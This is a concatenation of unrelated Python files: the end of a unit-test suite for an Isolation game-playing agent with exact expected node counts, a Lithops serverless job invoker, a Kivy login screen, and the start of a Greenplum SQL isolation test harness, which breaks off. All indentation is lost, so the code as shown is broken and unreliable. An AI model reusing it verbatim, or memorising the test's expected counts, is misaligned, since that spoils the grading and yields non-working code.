new_board = CounterBoard(self.__player_1__, self.__player_2__,
width=self.width, height=self.height)
new_board.move_count = self.move_count
new_board.__active_player__ = self.__active_player__
new_board.__inactive_player__ = self.__inactive_player__
new_board.__last_player_move__ = copy(self.__last_player_move__)
new_board.__player_symbols__ = copy(self.__player_symbols__)
new_board.__board_state__ = deepcopy(self.__board_state__)
new_board.counter = self.counter
new_board.visited = self.visited
new_board.root = self.root
return new_board
def forecast_move(self, move):
self.counter[move] += 1
self.visited.add(move)
new_board = self.copy()
new_board.apply_move(move)
if new_board.root is None:
new_board.root = move
return new_board
@property
def counts(self):
""" Return counts of (total, unique) nodes visited """
return sum(self.counter.values()), len(self.visited)
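# Usage sketch for CounterBoard (illustrative): each forecast_move() bumps the
# counters, and the `counts` property reports (total expansions, unique moves).
#
#   board = CounterBoard(player1, player2, 7, 7)
#   child = board.forecast_move((0, 0))
#   total, unique = board.counts   # -> (1, 1)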
class Project1Test(unittest.TestCase):
def initAUT(self, depth, eval_fn, iterative=False,
method="minimax", loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.CustomPlayer(depth, eval_fn, iterative, method)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
@timeout(5)
# @unittest.skip("Skip eval function test.") # Uncomment this line to skip test
def test_heuristic(self):
""" Test output interface of heuristic score function interface."""
player1 = "Player1"
player2 = "Player2"
p1_location = (0, 0)  # top left corner
p2_location = (1, 1)
game = isolation.Board(player1, player2)
game.apply_move(p1_location)
game.apply_move(p2_location)
self.assertIsInstance(game_agent.custom_score(game, player1), float,
"The heuristic function should return a floating point")
@timeout(5)
# @unittest.skip("Skip simple minimax test.") # Uncomment this line to skip test
def test_minimax_interface(self):
""" Test CustomPlayer.minimax interface with simple input """
h, w = 7, 7 # board size
test_depth = 1
starting_location = (5, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.minimax(next_state, test_depth)
self.assertTrue(type(v) == float,
("Minimax function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
@timeout(5)
# @unittest.skip("Skip alphabeta test.") # Uncomment this line to skip test
def test_alphabeta_interface(self):
""" Test CustomPlayer.alphabeta interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "alphabeta"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
v, _ = agentUT.alphabeta(next_state, test_depth)
self.assertTrue(type(v) == float,
("Alpha Beta function should return a floating " +
"point value approximating the score for the " +
"branch being searched."))
@timeout(5)
# @unittest.skip("Skip get_move test.") # Uncomment this line to skip test
def test_get_move_interface(self):
""" Test CustomPlayer.get_move interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
iterative_search = False
search_method = "minimax"
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.CustomPlayer(
test_depth, heuristic, iterative_search, search_method)
# Test that get_move returns a legal choice on an empty game board
board = isolation.Board(agentUT, 'null_agent', w, h)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on an " +
"empty board. It should return coordinates on the " +
"game board for the location of the agent's next " +
"move. The move must be one of the legal moves on " +
"the current game board."))
# Test that get_move returns a legal choice for first move as player 2
board = isolation.Board('null_agent', agentUT, w, h)
board.apply_move(starting_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed making the first " +
"move as player 2 on a new board. It should return " +
"coordinates on the game board for the location " +
"of the agent's next move. The move must be one " +
"of the legal moves on the current game board."))
# Test that get_move returns a legal choice after first move
board = isolation.Board(agentUT, 'null_agent', w, h)
board.apply_move(starting_location)
board.apply_move(adversary_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, legal_moves, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on a " +
"game in progress. It should return coordinates on" +
"the game board for the location of the agent's " +
"next move. The move must be one of the legal moves " +
"on the current game board."))
@timeout(5)
# @unittest.skip("Skip minimax test.") # Uncomment this line to skip test
def test_minimax(self):
""" Test CustomPlayer.minimax
This test uses a scoring function that returns a constant value based
on the location of the search agent on the board to force minimax to
choose a branch that visits those cells at a specific fixed-depth.
If minimax is working properly, it will visit a constant number of
nodes during the search and return one of the acceptable legal moves.
"""
h, w = 7, 7 # board size
starting_location = (2, 3)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "minimax"
# The agent under test starts at position (2, 3) on the board, which
# gives eight (8) possible legal moves [(0, 2), (0, 4), (1, 1), (1, 5),
# (3, 1), (3, 5), (4, 2), (4, 4)]. The search function will pick one of
# those moves based on the estimated score for each branch. The value
# only changes on odd depths because even depths end when the
# adversary has initiative.
value_table = [[0] * w for _ in range(h)]
value_table[1][5] = 1 # depth 1 & 2
value_table[4][3] = 2 # depth 3 & 4
value_table[6][6] = 3 # depth 5
heuristic = makeEvalTable(value_table)
# These moves are the branches that will lead to the cells in the value
# table for the search depths.
expected_moves = [set([(1, 5)]),
set([(3, 1), (3, 5)]),
set([(3, 5), (4, 2)])]
# Expected number of node expansions during search
counts = [(8, 8), (24, 10), (92, 27), (418, 32), (1650, 43)]
# Test fixed-depth search; note that odd depths mean that the searching
# player (student agent) has the last move, while even depths mean that
# the adversary has the last move before calling the heuristic
# evaluation function.
for idx in range(5):
test_depth = idx + 1
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.minimax(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, expected_moves[idx // 2], WRONG_MOVE.format(
method, test_depth, expected_moves[idx // 2], move))
@timeout(20)
# @unittest.skip("Skip alpha-beta test.") # Uncomment this line to skip test
def test_alphabeta(self):
""" Test CustomPlayer.alphabeta
This test uses a scoring function that returns a constant value based
on the branch being searched by alphabeta in the user agent, and forces
the search to prune on every other branch it visits. By using a huge
board where the players are too far apart to interact and every branch
has the same growth factor, the expansion and pruning must result in
an exact number of expanded nodes.
"""
h, w = 101, 101 # board size
starting_location = (50, 50)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "alphabeta"
# The agent under test starts in the middle of a huge board so that
# every branch has the same number of possible moves, so pruning any
# branch has the same effect during testing
# These are the expected number of node expansions for alphabeta search
# to explore the game tree to fixed depth. The custom eval function
# used for this test ensures that some branches must be pruned, while
# the search should still return an optimal move.
counts = [(8, 8), (17, 10), (74, 42), (139, 51), (540, 119)]
for idx in range(len(counts)):
test_depth = idx + 1 # pruning guarantee requires min depth of 3
first_branch = []
heuristic = makeBranchEval(first_branch)
agentUT, board = self.initAUT(test_depth, heuristic,
iterative_search, method,
loc1=starting_location,
loc2=adversary_location,
w=w, h=h)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
_, move = agentUT.alphabeta(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, first_branch, WRONG_MOVE.format(
method, test_depth, first_branch, move))
@timeout(20)
# @unittest.skip("Skip iterative deepening test.") # Uncomment this line to skip test
def test_get_move(self):
""" Test iterative deepening in CustomPlayer.get_move by placing an
agent on the game board and performing ID minimax search, which
should visit a specific number of unique nodes while expanding. By
forcing the search to timeout when a predetermined number of nodes
have been expanded, we can then verify that the expected number of
unique nodes have been visited.
"""
class DynamicTimer():
"""Dynamic Timer allows the time limit to be changed after the
timer is initialized so that the search timeout can be triggered
before the timer actually expires. This allows the timer to expire
when an event occurs, regardless of the clock time required until
the event happens.
"""
def __init__(self, time_limit):
self.time_limit = time_limit
self.start_time = curr_time_millis()
def time_left(self):
return self.time_limit - (curr_time_millis() - self.start_time)
w, h = 11, 11 # board size
adversary_location = (0, 0)
method = "minimax"
# The agent under test starts at the positions indicated below, and
# performs an iterative deepening minimax search (minimax is easier to
# test because it always visits all nodes in the game tree at every
# level).
origins = [(2, 3), (6, 6), (7, 4), (4, 2), (0, 5), (10, 10)]
exact_counts = [(8, 8), (32, 10), (160, 39), (603, 35), (1861, 54), (3912, 62)]
for idx in range(len(origins)):
# set the initial timer high enough that the search will not
# timeout before triggering the dynamic timer to halt by visiting
# the expected number of nodes
time_limit = 1e4
timer = DynamicTimer(time_limit)
eval_fn = makeEvalStop(exact_counts[idx][0], timer, time_limit)
agentUT, board = self.initAUT(-1, eval_fn, True, method,
origins[idx], adversary_location,
w, h)
legal_moves = board.get_legal_moves()
chosen_move = agentUT.get_move(board, legal_moves, timer.time_left)
diff_total = abs(board.counts[0] - exact_counts[idx][0])
diff_unique = abs(board.counts[1] - exact_counts[idx][1])
self.assertTrue(diff_total <= 1 and diff_unique == 0, ID_FAIL)
self.assertTrue(chosen_move in legal_moves, INVALID_MOVE.format(
legal_moves, chosen_move))
if __name__ == '__main__':
unittest.main()
|
invokers.py
|
#
# (C) Copyright IBM Corp. 2020
# (C) Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import time
import random
import queue
import shutil
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
from lithops.future import ResponseFuture
from lithops.config import extract_storage_config
from lithops.version import __version__ as lithops_version
from lithops.utils import version_str, is_lithops_worker, iterchunks
from lithops.constants import LOGGER_LEVEL, LOGS_DIR,\
LOCALHOST, SERVERLESS, STANDALONE
from lithops.util.metrics import PrometheusExporter
logger = logging.getLogger(__name__)
def create_invoker(config, executor_id, internal_storage,
compute_handler, job_monitor):
"""
Creates the appropriate invoker based on the backend type
"""
if compute_handler.get_backend_type() == 'batch':
return BatchInvoker(
config,
executor_id,
internal_storage,
compute_handler,
job_monitor
)
elif compute_handler.get_backend_type() == 'faas':
return FaaSInvoker(
config,
executor_id,
internal_storage,
compute_handler,
job_monitor
)
class Invoker:
"""
Abstract invoker class
"""
def __init__(self, config, executor_id, internal_storage, compute_handler, job_monitor):
log_level = logger.getEffectiveLevel()
self.log_active = log_level != logging.WARNING
self.log_level = LOGGER_LEVEL if not self.log_active else log_level
self.config = config
self.executor_id = executor_id
self.storage_config = extract_storage_config(self.config)
self.internal_storage = internal_storage
self.compute_handler = compute_handler
self.is_lithops_worker = is_lithops_worker()
self.job_monitor = job_monitor
prom_enabled = self.config['lithops'].get('telemetry', False)
prom_config = self.config.get('prometheus', {})
self.prometheus = PrometheusExporter(prom_enabled, prom_config)
self.mode = self.config['lithops']['mode']
self.backend = self.config['lithops']['backend']
self.customized_runtime = self.config['lithops'].get('customized_runtime', False)
self.runtime_name = self.config[self.backend]['runtime']
self.max_workers = self.config[self.backend].get('max_workers')
logger.debug(f'ExecutorID {self.executor_id} - Invoker initialized.'
f' Max workers: {self.max_workers}')
def select_runtime(self, job_id, runtime_memory):
"""
Return the runtime metadata
"""
if self.mode == SERVERLESS:
runtime_memory = runtime_memory or self.config[self.backend].get('runtime_memory')
runtime_timeout = self.config[self.backend].get('runtime_timeout')
elif self.mode == STANDALONE:
runtime_memory = None
runtime_timeout = self.config[STANDALONE]['hard_dismantle_timeout']
elif self.mode == LOCALHOST:
runtime_memory = None
runtime_timeout = None
msg = ('ExecutorID {} | JobID {} - Selected Runtime: {} '
.format(self.executor_id, job_id, self.runtime_name))
msg = msg+'- {}MB'.format(runtime_memory) if runtime_memory else msg
logger.info(msg)
runtime_key = self.compute_handler.get_runtime_key(self.runtime_name, runtime_memory)
runtime_meta = self.internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
msg = 'Runtime {}'.format(self.runtime_name)
msg = msg+' with {}MB'.format(runtime_memory) if runtime_memory else msg
logger.info(msg+' is not yet installed')
runtime_meta = self.compute_handler.create_runtime(self.runtime_name, runtime_memory, runtime_timeout)
runtime_meta['runtime_timeout'] = runtime_timeout
self.internal_storage.put_runtime_meta(runtime_key, runtime_meta)
# Verify python version and lithops version
if lithops_version != runtime_meta['lithops_version']:
raise Exception("Lithops version mismatch. Host version: {} - Runtime version: {}"
.format(lithops_version, runtime_meta['lithops_version']))
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_version']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(self.runtime_name, py_remote_version, py_local_version))
return runtime_meta
def _create_payload(self, job):
"""
Creates the default payload dictionary
"""
payload = {'config': self.config,
'chunksize': job.chunksize,
'log_level': self.log_level,
'func_key': job.func_key,
'data_key': job.data_key,
'extra_env': job.extra_env,
'total_calls': job.total_calls,
'execution_timeout': job.execution_timeout,
'data_byte_ranges': job.data_byte_ranges,
'executor_id': job.executor_id,
'job_id': job.job_id,
'job_key': job.job_key,
'max_workers': self.max_workers,
'call_ids': None,
'host_submit_tstamp': time.time(),
'lithops_version': lithops_version,
'runtime_name': job.runtime_name,
'runtime_memory': job.runtime_memory,
'worker_processes': job.worker_processes}
return payload
def _run_job(self, job):
"""
Run a job
"""
if self.customized_runtime:
logger.debug('ExecutorID {} | JobID {} - Customized runtime activated'
.format(job.executor_id, job.job_id))
job.runtime_name = self.runtime_name
extend_runtime(job, self.compute_handler, self.internal_storage)
self.runtime_name = job.runtime_name
logger.info('ExecutorID {} | JobID {} - Starting function '
'invocation: {}() - Total: {} activations'
.format(job.executor_id, job.job_id,
job.function_name, job.total_calls))
logger.debug('ExecutorID {} | JobID {} - Worker processes: {} - Chunksize: {}'
.format(job.executor_id, job.job_id, job.worker_processes, job.chunksize))
self.prometheus.send_metric(
name='job_total_calls',
value=job.total_calls,
type='counter',
labels=(
('job_id', job.job_key),
('function_name', job.function_name)
)
)
self.prometheus.send_metric(
name='job_runtime_memory',
value=job.runtime_memory or 0,
type='counter',
labels=(
('job_id', job.job_key),
('function_name', job.function_name)
)
)
try:
job.runtime_name = self.runtime_name
self._invoke_job(job)
except (KeyboardInterrupt, Exception) as e:
self.stop()
raise e
log_file = os.path.join(LOGS_DIR, job.job_key+'.log')
logger.info("ExecutorID {} | JobID {} - View execution logs at {}"
.format(job.executor_id, job.job_id, log_file))
# Create all futures
futures = []
for i in range(job.total_calls):
call_id = "{:05d}".format(i)
fut = ResponseFuture(call_id, job,
job.metadata.copy(),
self.storage_config)
fut._set_state(ResponseFuture.State.Invoked)
futures.append(fut)
job.futures = futures
return futures
def stop(self):
"""
Stop invoker-related processes
"""
pass
class BatchInvoker(Invoker):
"""
Module responsible for performing the invocations against a batch backend
"""
def __init__(self, config, executor_id, internal_storage, compute_handler, job_monitor):
super().__init__(config, executor_id, internal_storage, compute_handler, job_monitor)
self.compute_handler.init()
def _invoke_job(self, job):
"""
Run a job
"""
payload = self._create_payload(job)
payload['call_ids'] = ["{:05d}".format(i) for i in range(job.total_calls)]
start = time.time()
activation_id = self.compute_handler.invoke(payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
logger.debug('ExecutorID {} | JobID {} - Job invoked ({}s) - Activation ID: {}'
.format(job.executor_id, job.job_id, resp_time, activation_id or job.job_key))
def run_job(self, job):
"""
Run a job
"""
# Ensure only self.max_workers are started
total_workers = job.total_calls // job.chunksize + (job.total_calls % job.chunksize > 0)
if self.max_workers < total_workers:
job.chunksize = job.total_calls // self.max_workers + (job.total_calls % self.max_workers > 0)
# Perform the invocation
futures = self._run_job(job)
self.job_monitor.start(futures)
return futures
class FaaSInvoker(Invoker):
"""
Module responsible for performing the invocations against a FaaS backend
"""
ASYNC_INVOKERS = 2
def __init__(self, config, executor_id, internal_storage, compute_handler, job_monitor):
super().__init__(config, executor_id, internal_storage, compute_handler, job_monitor)
remote_invoker = self.config[self.backend].get('remote_invoker', False)
self.remote_invoker = remote_invoker if not is_lithops_worker() else False
self.invokers = []
self.ongoing_activations = 0
self.pending_calls_q = queue.Queue()
self.should_run = False
self.sync = is_lithops_worker()
invoke_pool_threads = self.config[self.backend]['invoke_pool_threads']
self.executor = ThreadPoolExecutor(invoke_pool_threads)
logger.debug('ExecutorID {} - Serverless invoker created'.format(self.executor_id))
def _start_async_invokers(self):
"""Starts the invoker process responsible to spawn pending calls
in background.
"""
def invoker_process(inv_id):
"""Run process that implements token bucket scheduling approach"""
logger.debug('ExecutorID {} - Async invoker {} started'
.format(self.executor_id, inv_id))
with ThreadPoolExecutor(max_workers=250) as executor:
while self.should_run:
try:
self.job_monitor.token_bucket_q.get()
job, call_ids_range = self.pending_calls_q.get()
except KeyboardInterrupt:
break
if self.should_run:
executor.submit(self._invoke_task, job, call_ids_range)
else:
break
logger.debug('ExecutorID {} - Async invoker {} finished'
.format(self.executor_id, inv_id))
for inv_id in range(self.ASYNC_INVOKERS):
p = threading.Thread(target=invoker_process, args=(inv_id,))
self.invokers.append(p)
p.daemon = True
p.start()
def stop(self):
"""
Stop async invokers
"""
if self.invokers:
logger.debug('ExecutorID {} - Stopping async invokers'
.format(self.executor_id))
self.should_run = False
while not self.pending_calls_q.empty():
try:
self.pending_calls_q.get(False)
except Exception:
pass
for invoker in self.invokers:
self.job_monitor.token_bucket_q.put('$')
self.pending_calls_q.put((None, None))
self.invokers = []
def _invoke_task(self, job, call_ids_range):
"""Method used to perform the actual invocation against the
compute backend.
"""
# prepare payload
payload = self._create_payload(job)
call_ids = ["{:05d}".format(i) for i in call_ids_range]
payload['call_ids'] = call_ids
if job.data_key:
data_byte_ranges = [job.data_byte_ranges[int(call_id)] for call_id in call_ids]
payload['data_byte_ranges'] = data_byte_ranges
else:
del payload['data_byte_ranges']
payload['data_byte_strs'] = [job.data_byte_strs[int(call_id)] for call_id in call_ids]
# do the invocation
start = time.time()
activation_id = self.compute_handler.invoke(payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if not activation_id:
# reached quota limit
time.sleep(random.randint(0, 5))
self.pending_calls_q.put((job, call_ids_range))
self.job_monitor.token_bucket_q.put('#')
return
logger.debug('ExecutorID {} | JobID {} - Calls {} invoked ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, ', '.join(call_ids),
resp_time, activation_id))
def _invoke_job_remote(self, job):
"""
Logic for invoking a job using a remote function
"""
start = time.time()
payload = {}
payload['config'] = self.config
payload['log_level'] = self.log_level
payload['runtime_name'] = job.runtime_name
payload['runtime_memory'] = job.runtime_memory
payload['remote_invoker'] = True
payload['job'] = job.__dict__
activation_id = self.compute_handler.invoke(payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if activation_id:
logger.debug('ExecutorID {} | JobID {} - Remote invoker call done ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, resp_time, activation_id))
else:
raise Exception('Unable to spawn remote invoker')
def _invoke_job(self, job):
"""
Normal Invocation
Use local threads to perform all the function invocations
"""
if self.remote_invoker:
return self._invoke_job_remote(job)
if self.should_run is False:
self.running_workers = 0
self.should_run = True
self._start_async_invokers()
if self.running_workers < self.max_workers:
free_workers = self.max_workers - self.running_workers
total_direct = free_workers * job.chunksize
callids = range(job.total_calls)
callids_to_invoke_direct = callids[:total_direct]
callids_to_invoke_nondirect = callids[total_direct:]
ci = len(callids_to_invoke_direct)
cz = job.chunksize
consumed_workers = ci // cz + (ci % cz > 0)
self.running_workers += consumed_workers
logger.debug('ExecutorID {} | JobID {} - Free workers:'
' {} - Going to run {} activations in {} workers'
.format(job.executor_id, job.job_id, free_workers,
len(callids_to_invoke_direct), consumed_workers))
def _callback(future):
future.result()
invoke_futures = []
for call_ids_range in iterchunks(callids_to_invoke_direct, job.chunksize):
future = self.executor.submit(self._invoke_task, job, call_ids_range)
future.add_done_callback(_callback)
invoke_futures.append(future)
if self.sync:
[f.result() for f in invoke_futures]
# Put into the queue the rest of the callids to invoke within the process
if callids_to_invoke_nondirect:
logger.debug('ExecutorID {} | JobID {} - Putting remaining '
'{} function activations into pending queue'
.format(job.executor_id, job.job_id,
len(callids_to_invoke_nondirect)))
for call_ids_range in iterchunks(callids_to_invoke_nondirect, job.chunksize):
self.pending_calls_q.put((job, call_ids_range))
else:
logger.debug('ExecutorID {} | JobID {} - Reached maximum {} '
'workers, queuing {} function activations'
.format(job.executor_id, job.job_id,
self.max_workers, job.total_calls))
for call_ids_range in iterchunks(range(job.total_calls), job.chunksize):
self.pending_calls_q.put((job, call_ids_range))
def run_job(self, job):
"""
Run a job
"""
futures = self._run_job(job)
self.job_monitor.start(
fs=futures,
job_id=job.job_id,
chunksize=job.chunksize,
generate_tokens=True
)
return futures
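# A minimal standalone sketch (a toy, not Lithops code) of the token-bucket
# pattern used by the async invokers above: each token taken from the queue
# grants permission for one invocation, and finished workers put a token
# back, bounding the number of in-flight calls.
def _example_token_bucket(tasks, max_inflight=2):
    import queue
    import threading
    tokens = queue.Queue()
    for _ in range(max_inflight):
        tokens.put('#')  # initial capacity
    def _worker(task):
        try:
            pass  # ... perform the invocation for `task` here ...
        finally:
            tokens.put('#')  # return the token when done
    for task in tasks:
        tokens.get()  # blocks until a token is available
        threading.Thread(target=_worker, args=(task,)).start()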
def extend_runtime(job, compute_handler, internal_storage):
"""
This method is used when customized_runtime is active
"""
base_docker_image = job.runtime_name
uuid = job.ext_runtime_uuid
ext_runtime_name = "{}:{}".format(base_docker_image.split(":")[0], uuid)
# update job with new extended runtime name
job.runtime_name = ext_runtime_name
runtime_key = compute_handler.get_runtime_key(job.runtime_name, job.runtime_memory)
runtime_meta = internal_storage.get_runtime_meta(runtime_key)
if not runtime_meta:
logger.info('Creating runtime: {}, memory: {}MB'.format(ext_runtime_name, job.runtime_memory))
ext_docker_file = '/'.join([job.local_tmp_dir, "Dockerfile"])
# Generate Dockerfile extended with function dependencies and function
with open(ext_docker_file, 'w') as df:
df.write('\n'.join([
'FROM {}'.format(base_docker_image),
'ENV PYTHONPATH=/tmp/lithops/modules:$PYTHONPATH',
# set python path to point to dependencies folder
'COPY . /tmp/lithops'
]))
# Build new extended runtime tagged by function hash
cwd = os.getcwd()
os.chdir(job.local_tmp_dir)
compute_handler.build_runtime(ext_runtime_name, ext_docker_file)
os.chdir(cwd)
shutil.rmtree(job.local_tmp_dir, ignore_errors=True)
runtime_meta = compute_handler.create_runtime(ext_runtime_name, job.runtime_memory, job.runtime_timeout)
runtime_meta['runtime_timeout'] = job.runtime_timeout
internal_storage.put_runtime_meta(runtime_key, runtime_meta)
# Verify python version and lithops version
if lithops_version != runtime_meta['lithops_version']:
raise Exception("Lithops version mismatch. Host version: {} - Runtime version: {}"
.format(lithops_version, runtime_meta['lithops_version']))
py_local_version = version_str(sys.version_info)
py_remote_version = runtime_meta['python_version']
if py_local_version != py_remote_version:
raise Exception(("The indicated runtime '{}' is running Python {} and it "
"is not compatible with the local Python version {}")
.format(job.runtime_name, py_remote_version, py_local_version))
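# For reference, the Dockerfile generated by extend_runtime() above looks
# like this, with <base> standing for the original runtime image:
#
#   FROM <base>
#   ENV PYTHONPATH=/tmp/lithops/modules:$PYTHONPATH
#   COPY . /tmp/lithops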
|
login.py
|
from kivy.metrics import dp
from kivy.lang import Builder
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import Screen
from kivy.clock import Clock
import socket
from threading import Thread
Builder.load_string("""
#:import IconInput uix.inputs.IconInput
#:import ButtonEffect uix.buttons.ButtonEffect
#:import ButtonIcon uix.icons.ButtonIcon
#:import icon utils.icon
#:import background utils.background
<Login>:
AnchorLayout:
anchor_x: 'center'
anchor_y: 'center'
canvas:
Color:
rgba:mid_gray
Rectangle:
size:self.size
pos:self.pos
BoxLayout:
orientation:'vertical'
id:box_principal
size_hint:None,None
size:root.width/1.8, root.height/1.1
on_size:root.size_login(self, args[1])
canvas:
Color:
rgba:light_gray
RoundedRectangle:
size: self.size
pos: self.pos
radius:[dp(20), dp(20), dp(20), dp(20)]
FloatLayout:
size_hint: None, None
size: 0, 0
ButtonIcon:
pos: (root.width-(self.width*2), root.height-(self.height*2))
icon_source: icon('skip')
on_press: root.manager.current = 'gamepad'
AnchorLayout:
Label:
text:'Login'
font_size:'30sp'
AnchorLayout:
size_hint_y:None
height:'140dp'
on_size:
self.padding= [self.width/9,dp(10),self.width/9,10] if \
self.width >= dp(600) else [dp(20),dp(10),dp(20),dp(10)]
BoxLayout:
orientation:'vertical'
spacing:'10dp'
IconInput:
id: input
radius: [dp(8), dp(8), dp(8), dp(8)]
icon_left_source: icon('user')
icon_left_size: [dp(30), dp(25)]
label_text: 'Username'
label_pos_color: green
on_enter: root.start_thread_login()
IconInput:
radius: [dp(8), dp(8), dp(8), dp(8)]
icon_left_source: icon('password')
icon_left_size: [dp(30), dp(25)]
icon_right_state_sources: [icon('unsee_eye'), icon('see_eye')]
icon_right_color_pos: green
icon_right_effect_color: clear_white
icon_right_size: [dp(30), dp(32)]
label_pos_color: green
hide:
True if self.ids.button_right.state == 'normal' else False
label_text: 'Password'
AnchorLayout:
size_hint_y:None
height:'50dp'
BoxLayout:
size_hint_x:None
width:'130dp'
CheckBox:
size_hint_x:0.18
id:r_check
Button:
background_color: [1, 1, 1, 0]
                        text: 'Remember Password'
on_press:
                            r_check.active = not r_check.active
AnchorLayout:
padding:[dp(10),dp(20),dp(10),1]
size_hint_y:None
height:'60dp'
ButtonEffect:
                    text:'Log In'
size_hint_x:None
width:'150dp'
background_color: [0, 0, 0, 0]
color_line: [clear_white, white]
color_effect: light_gray
radius: [dp(15), dp(15), dp(15), dp(15)]
on_press: root.start_thread_login()
Widget:
size_hint_y:0.3
AnchorLayout:
size_hint_y:None
height:'40dp'
ButtonEffect:
size_hint_x: None
width: '200dp'
                    text: 'Forgot your password?'
color_text: [white, green]
color_line: [0, 0, 0, 0]
effect_color: [0, 0, 0, 0]
Widget:
size_hint_y:0.3
""")
class Login(Screen):
can_call_thread = False
gamepad = ObjectProperty(None)
def on_init_input(self, *args):
self.manager.current = 'gamepad'
def start_thread_login(self, *args):
if self.can_call_thread:
return None
username = self.ids.input.ids.input.text
if not username:
return None
self.can_call_thread = True
self.gamepad.username = username
th = Thread(target=self.login_game)
th.start()
def login_game(self, *args):
        successful = True
gmp = self.gamepad
esp = gmp.connect_to_esp(force=True)
if gmp.conn is None:
gmp.start_server()
if esp is None or gmp.conn is None:
self.can_call_thread = False
self.gamepad.username = ''
return False
try:
esp.send(f'{gmp.index_player}:np:{gmp.username}:{gmp.HOST}:{gmp.PORT}\n'.encode('utf-8'))
            print('Started!!')
Clock.schedule_once(self.gamepad.start_game, 0.5)
except (ConnectionAbortedError, socket.timeout, TimeoutError):
            successful = False
        if successful:
try:
values = esp.recv(1024).decode('utf-8').strip("\n").split(":")
except socket.timeout:
values = []
print(values)
if len(values) < 2:
                successful = False
elif values[0] == "erro":
                successful = False
elif values[0] == "start":
# values[1::] == INDEX, LIFES
username = self.ids.input.ids.input.text
self.gamepad.username = username
self.gamepad.index_player = int(values[1])
self.gamepad.lifes = int(values[2])
else:
self.gamepad.username = ''
self.gamepad.close_connection_esp(esp)
self.can_call_thread = False
def size_login(self, box, size):
w, h = size
if w <= dp(340):
box.width = self.width/1.2
if h >= dp(650):
box.height = h/1.25
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pygresql.pg
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
def is_digit(n):
try:
int(n)
return True
except ValueError:
return False
def load_helper_file(helper_file):
with open(helper_file) as file:
return "".join(file.readlines()).strip()
def parse_include_statement(sql):
include_statement, command = sql.split(None, 1)
